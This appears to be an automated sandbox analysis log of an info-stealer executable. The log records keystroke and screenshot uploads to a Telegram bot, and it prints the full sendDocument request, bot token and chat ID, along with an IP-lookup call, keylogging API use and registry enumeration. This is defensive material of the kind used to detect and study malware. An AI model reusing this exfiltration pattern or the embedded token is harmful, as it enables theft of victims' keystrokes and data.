Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 997Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 997Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 634Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Code function: 9_2_00405054 InternetReadFile,

9_2_00405054

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic	DNS traffic detected: DNS query: showip.net
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 13917Connection: Keep-AliveCache-Control: no-cache

Source: LjlEiSlJe.exe, 0000000B.00000002.2160441879.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2102675046.0000000002701000.00000004.00000800.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2160441879.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/s
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/&
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/M
Source: yMvZXcwN2OdoP6x.exe, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/mplates
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/x
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49848 version: TLS 1.2

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Code function: 9_2_00405398 GetAsyncKeyState,

9_2_00405398

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B821B8	0_2_04B821B8
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B80EE8	0_2_04B80EE8
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B87278	0_2_04B87278
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B821B7	0_2_04B821B7
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B8A3C2	0_2_04B8A3C2
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B80EE7	0_2_04B80EE7
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B82A98	0_2_04B82A98
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B82A97	0_2_04B82A97
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B83498	0_2_04B83498
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B835A0	0_2_04B835A0
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B8359F	0_2_04B8359F
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_06C20570	0_2_06C20570
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_077286A8	0_2_077286A8
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_0772A5C0	0_2_0772A5C0
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_07728270	0_2_07728270
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_0772A188	0_2_0772A188
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_07729F27	0_2_07729F27
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_07728AE0	0_2_07728AE0
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 9_2_0042BFE0	9_2_0042BFE0
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02772202	11_2_02772202
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770EE8	11_2_02770EE8
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02777278	11_2_02777278
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_0277A3BB	11_2_0277A3BB
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770A11	11_2_02770A11
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770AC6	11_2_02770AC6
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02772A98	11_2_02772A98
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770A8A	11_2_02770A8A
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02772A88	11_2_02772A88
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770B7F	11_2_02770B7F
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770B57	11_2_02770B57
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770BE5	11_2_02770BE5
